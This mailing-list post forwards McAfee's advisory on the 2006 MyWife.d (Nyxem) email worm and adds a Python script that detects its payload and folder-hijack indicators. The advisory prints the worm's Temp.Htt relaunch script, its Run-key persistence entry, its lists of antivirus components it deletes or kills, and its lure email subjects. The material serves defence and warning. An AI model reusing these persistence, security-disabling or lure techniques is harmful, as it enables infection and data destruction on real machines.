
VIRUS ALERT FROM HOPE4KYIV

Posted by: lifeunlimited <lifeunlimited@...>

Friends of "Hope4Kyiv":
 
In case you have not yet been alerted to a potentially destructive computer virus that is programmed to engage on February 3rd, and the 3rd of every month subsequently, I'm sending this warning from McAfee Security Center.  I've also received similar information from other sources including Zone Alarm, which gives it a high rating instead of low as McAfee does.
 
As I understand it, this virus is programmed to essentially destroy most or all of the Microsoft Office software files (Word, Excel, PowerPoint, etc.).
 
If you do not have proper protection, you need to get it immediately.  And, it has been recommended that you not only do a virus scan on your computer, but even do searches for files that end with the strings that are noted below.
 
There is lots of information here that I personally don't understand, but the important thing is to scan, and update your anti-virus program immediately.
 
In His Bond, By His Grace, and For His Kingdom,
 
Bob Tolliver
 
------------------------------------------------
 
Virus Profile: W32/MyWife.d@MM!M24

Risk Assessment
  - Home Users: Low
  - Corporate Users: Low
Date Discovered: 1/17/2006
Date Added: 1/17/2006
Origin: Unknown
Length: Varies
Type: Virus
SubType: E-mail
DAT Required: 4642
 
Virus Characteristics
-- Update Feb 2, 2006 --
CME number assigned (CME-24).
This worm is proactively detected by 4642 and higher DATs as W32/Generic.worm!p2p. 4677 and higher DATs detect it specifically as W32/MyWife.d@MM.
This is a mass-mailing worm that bears the following characteristics:
    contains its own SMTP engine to construct outgoing messages
    spreads through open network shares
    tries to lower security settings and disable security software
    overwrites files on the 3rd of each month
 
E-mail Component:
The virus arrives in an email message as follows:
From: (Spoofed email sender)
Do not assume that the sender address indicates who is infected. You may also receive alert messages from a mail server saying that you are infected, which may not be the case.
 
Subject: (Varies, such as)
Photos
My photos
School girl fantasies gone bad
Part 1 of 6 Video clipe
*Hot Movie*
Re:
Fw: Picturs
Fw: Funny 🙂
Fwd: Photo
Fwd: image.jpg
Fw: Sexy
Fw:
Fwd: Crazy illegal Sex!
Fw: Real show
Fw: SeX.mpg
Fw: DSC-00465.jpg
Re: Sex Video
Word file
the file
eBook.pdf
Miss Lebanon 2006
A Great Video
give me a kiss
 
Body:  (Varies, such as)  
Note: forwarded message attached.
You Must View This Videoclip!
>> forwarded message
i just any one see my photos.
forwarded message attached.
Please see the file.
----- forwarded message -----
The Best Videoclip Ever
Hot XXX Yahoo Groups
F***in Kama Sutra pics
ready to be F***ED 😉
VIDEOS! FREE! (US$ 0,00)
It's Free 🙂
hello,
i send the file.
bye
hi
i send the details
i attached the details.
how are you?
What?
Thank you
i send the details.
OK ?
(N.B. *** replaces content for filtering purposes)
 
Attachment:
The files attached to the email may either be the executable itself or a MIME encoded file which contains the executable.
The executable filename is chosen from the following list:
04.pif
007.pif
School.pif
photo.pif
DSC-00465.Pif
Arab sex DSC-00465.jpg
image04.pif
677.pif
DSC-00465.pIf
New_Document_file.pif
eBook.PIF
document.pif
The MIME-encoded file's name is chosen from the following list:
SeX.mim
Sex.mim
WinZip.BHX
3.92315089702606E02.UUE
Attachments[001].B64
eBook.Uu
Word_Document.hqx
Word_Document.uu
Attachments00.HQX
Attachments001.BHX
Video_part.mim
It may also be built from one of the following prefixes:
392315089702606E-02
Clipe
Miss
Sweet_09
with the following file extensions:
.mim
.HQX
.BHx
.b64
.uu
.UUE
 
The filename within the MIME encoded file is chosen from the following list:
Attachments[001],B64 .sCr
392315089702606E-02,UUE .scR
SeX,zip .scR
WinZip.zip .sCR
ATT01.zip .sCR
Word.zip .sCR
Word XP.zip .sCR
New Video,zip .sCr
Atta[001],zip .SCR
Attachments,zip .SCR
Clipe,zip .sCr
WinZip,zip .scR
Adults_9,zip .sCR
Photos,zip .sCR
 
When this file is run, it copies itself to the Windows System directory as one or more of the following filenames:
%SysDir%\Winzip.exe
%SysDir%\Update.exe
%SysDir%\scanregw.exe
%WinDir%\Rundll16.exe
%WinDir%\winzip_tmp.exe
c:\winzip_tmp.exe
%Temp%\word.zip                                        .exe
(Where %SysDir% is the Windows System directory - for example C:\WINDOWS\SYSTEM - %WinDir% is the Windows directory, and %Temp% is the Temp directory)
 
It creates the following registry entry to hook Windows startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry="scanregw.exe /scan"
 
Network Share Component:
The worm will attempt to copy itself to the following shares, using the current user's authentication:
C$\documents and settings\all users\start menu\programs\startup\winzip quick pick.exe
Admin$\winzip_tmp.exe
C$\winzip_tmp.exe
The worm creates scheduled tasks on the remote computer to run winzip_tmp.exe during the 59th minute of every hour. Once the 59th minute is reached, the remote computer is itself infected as it runs the dropped payload.
Indications of Infection
 
Security Settings Modification:
The following registry keys are modified to lower security settings:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\NotifyDownloadComplete="7562617"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Explorer\Advanced\WebView="0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Explorer\Advanced\ShowSuperHidden="0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\FullPath="0"
 
Registry entries under the following key are modified to disable security software:
SOFTWARE\Classes\Licenses
.EXE or .PPL files found within the folders listed for the following registry entries are deleted:
HKEY_LOCAL_MACHINE\Software\INTEL\LANDesk\VirusProtect6\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Symantec\InstalledApps
HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\101
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Panda Antivirus 6.0 Platinum
HKEY_LOCAL_MACHINE\Software\KasperskyLab\InstalledProducts\Kaspersky Anti-Virus Personal
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\Iface.exe
 
The worm attempts to delete the following files:
%ProgramFiles%\DAP\*.dll
%ProgramFiles%\BearShare\*.dll
%ProgramFiles%\Symantec\LiveUpdate\*.*
%ProgramFiles%\Symantec\Common Files\Symantec Shared\*.*
%ProgramFiles%\Norton AntiVirus\*.exe
%ProgramFiles%\Alwil Software\Avast4\*.exe
%ProgramFiles%\McAfee.com\VSO\*.exe
%ProgramFiles%\McAfee.com\Agent\*.*
%ProgramFiles%\McAfee.com\shared\*.*
%ProgramFiles%\Trend Micro\PC-cillin 2002\*.exe
%ProgramFiles%\Trend Micro\PC-cillin 2003\*.exe
%ProgramFiles%\Trend Micro\Internet Security\*.exe
%ProgramFiles%\NavNT\*.exe
%ProgramFiles%\Morpheus\*.dll
%ProgramFiles%\Kaspersky Lab\Kaspersky Anti-Virus Personal\*.ppl
%ProgramFiles%\Kaspersky Lab\Kaspersky Anti-Virus Personal\*.exe
%ProgramFiles%\Grisoft\AVG7\*.dll
%ProgramFiles%\TREND MICRO\OfficeScan\*.dll
%ProgramFiles%\Trend Micro\OfficeScan Client\*.exe
%ProgramFiles%\LimeWire\LimeWire 4.2.6\LimeWire.jar
It also tries to delete files from the following locations on network shares:
C$\Program Files\Norton AntiVirus
C$\Program Files\Common Files\symantec shared
C$\Program Files\Symantec\LiveUpdate
C$\Program Files\McAfee.com\VSO
C$\Program Files\McAfee.com\Agent
C$\Program Files\McAfee.com\shared
C$\Program Files\Trend Micro\PC-cillin 2002
C$\Program Files\Trend Micro\PC-cillin 2003
C$\Program Files\Trend Micro\Internet Security
C$\Program Files\NavNT
C$\Program Files\Panda Software\Panda Antivirus Platinum
C$\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal
C$\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro
C$\Program Files\Panda Software\Panda Antivirus 6.0
C$\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus
 
It monitors the internet browser for the following strings:
YAHOO! MAIL -
@YAHOOGROUPS
BLOCKSENDER
SCRIBE
YAHOOGROUPS
TREND
PANDA
SECUR
SPAM
ANTI
CILLIN
CA.COM
AVG
GROUPS.MSN
NOMAIL.YAHOO.COM
EEYE
MICROSOFT
HOTMAIL
MSN
MYWAY
GMAIL.COM
@HOTMAIL
@HOTPOP
 
The worm will close applications whose title contains one of the following strings:
SYMANTEC
SCAN
KASPERSKY
VIRUS
MCAFEE
TREND MICRO
NORTON
REMOVAL
FIX
 
The values in the list below are deleted from Registry Run and Runservices keys, to prevent them from being restarted:
PCCIOMON.exe
pccguide.exe
Pop3trap.exe
PccPfw
tmproxy
McAfeeVirusScanService
NAV Agent
PCCClient.exe
SSDPSRV
rtvscn95
defwatch
vptray
ScanInicio
APVXDWIN
KAVPersonal50
kaspersky
TM Outbreak Agent
AVG7_Run
AVG_CC
Avgserv9.exe
AVGW
AVG7_CC
AVG7_EMC
Vet Alert
VetTray
OfficeScanNT Monitor
avast!
DownloadAccelerator
BearShare
Replicating into new directories
The worm will open the following directories:
Documents and Settings
Documents and Settings\%USERS%\My Documents
Program Files
RECYCLER
System Volume Information
and place three files in each directory with the following names:
desktop.ini
Temp.Htt
WinZip_Tmp.exe (a copy of the worm)
It also changes the settings on the infected system to "Hide protected operating system files".
Having desktop.ini and Temp.Htt in any folder turns it into an HTML-browsable folder: desktop.ini points to Temp.Htt as the template file that runs every time the folder is viewed:
PersistMoniker=file://Temp.Htt
Inside Temp.Htt there is another call to "WinZip_Temp.exe" to activate the worm in case no thread of the malware is running:
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"WinZip_Tmp.exe#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">" ="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>
While the worm is loaded in memory, every time explorer.exe is launched and a certain folder is viewed, these three files will be copied into that folder and the settings forced again to hide their existence.
 
Date Activated Payload
On the 3rd day of any month, approximately 30 minutes after an infected system is started, the worm overwrites files on local drives with the following extensions with the text "DATA Error [47 0F 94 93 F4 K5]":
DOC
XLS
MDB
MDE
PPT
PPS
ZIP
RAR
PDF
PSD
DMP
Testing confirms that this payload does not affect mapped network drives.
Infection Counter
Whenever a machine is initially infected, the worm connects to a website to increment a counter:
webstats.web.rcn.net/cgi-bin/Count.cgi [censored]
Tray Icon
The worm adds an icon to the system tray displaying the string "Update Please wait" if one of these folders is found in %ProgramFiles%:
Norton Antivirus
Kaspersky Lab
Panda Software
 
 
Method of Infection
This worm tries to spread via email and by copying itself to local shares.
The mailing component harvests addresses from the local system. Files with the following strings are targeted:
.HTM
.DBX
.EML
.MSG
.OFT
.NWS
.VCF
.MBX
.IMH
.TXT
.MSF
CONTENT.
TEMPORARY

 
Removal Instructions
All Users:
Use current engine and DAT files for detection and removal.
Modifications made to the system Registry and/or INI files for the purposes of hooking system startup will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).
Aliases
CME-24, Nyxem.E (F-Secure), W32.Blackmal.E@mm (NAV), W32/Grew.A!wm (Fortinet), W32/Kapser.A@mm (F-Prot), W32/MyWife.d@MM, W32/MyWife.d@MM!M24, W32/Nyxem-D (Sophos), W32/Tearec.A.worm (Panda), Win32/Blackmal.F (Vet), WORM_GREW.A (Trend)
Variants
Virus Name: (not preserved in this copy)
Type: Virus
Sub Type: E-mail
Differences: This detection was added briefly, but it has since been determined that it was in fact a corrupted W32/MyWife.d@MM. Such files will now be detected as W32/MyWife.d@MM!M24.
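As an added example (not from the McAfee profile or the original post), the following Python script walks a directory tree for two of the indicators described under "Date Activated Payload" and "Replicating into new directories": documents of the listed types whose contents now begin with the text "DATA Error [47 0F 94 93 F4 K5]", and folders holding a desktop.ini whose PersistMoniker points at Temp.Htt next to that template. The sample tree it builds is constructed for the example; the Temp.Htt it writes is an empty placeholder, not the worm's template.

```python
import os
import tempfile
from pathlib import Path

PAYLOAD_MARKER = b"DATA Error [47 0F 94 93 F4 K5]"  # text the payload writes
TARGET_EXTS = {".doc", ".xls", ".mdb", ".mde", ".ppt", ".pps",
               ".zip", ".rar", ".pdf", ".psd", ".dmp"}
PERSIST_LINE = b"persistmoniker=file://temp.htt"  # compared case-insensitively

def is_overwritten(path: Path) -> bool:
    """True if a file of a targeted type now begins with the payload marker."""
    if path.suffix.lower() not in TARGET_EXTS or not path.is_file():
        return False
    with path.open("rb") as fh:
        return fh.read(len(PAYLOAD_MARKER)) == PAYLOAD_MARKER

def is_hijacked_folder(dirpath: str, files: list) -> bool:
    """True if desktop.ini points at Temp.Htt and the template is present."""
    lower = {f.lower(): f for f in files}
    if "desktop.ini" not in lower or "temp.htt" not in lower:
        return False
    ini = Path(dirpath, lower["desktop.ini"]).read_bytes().lower()
    return PERSIST_LINE in ini.replace(b" ", b"")

def triage(root) -> dict:
    """Walk root; list overwritten documents and folders the worm rewired."""
    overwritten, hijacked = [], []
    for dirpath, _dirs, files in os.walk(root):
        if is_hijacked_folder(dirpath, files):
            hijacked.append(dirpath)
        overwritten += [str(Path(dirpath, f)) for f in files
                        if is_overwritten(Path(dirpath, f))]
    return {"overwritten": sorted(overwritten), "hijacked": sorted(hijacked)}

def build_sample_tree(base: str) -> None:
    """Constructed sample: a clobbered .doc, an intact .pdf, a rewired folder."""
    docs = Path(base, "docs"); docs.mkdir()
    (docs / "budget.doc").write_bytes(PAYLOAD_MARKER + b"\x00" * 16)
    (docs / "report.pdf").write_bytes(b"%PDF-1.4 intact content")
    rec = Path(base, "RECYCLER"); rec.mkdir()
    (rec / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\nPersistMoniker=file://Temp.Htt\r\n")
    (rec / "Temp.Htt").write_bytes(b"<html></html>")  # placeholder, not the worm's template

def demo() -> dict:
    """Build the sample tree in a temp dir and return indicator counts."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        found = triage(tmp)
    return {k: len(v) for k, v in found.items()}
```

Call triage() with the root of a mounted copy of the suspect disk from a clean system; demo() runs the same checks on the constructed tree and returns {'overwritten': 1, 'hijacked': 1}.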

  --  To unsubscribe, send ANY message to: hope4kyiv-unsubscribe@welovegod.org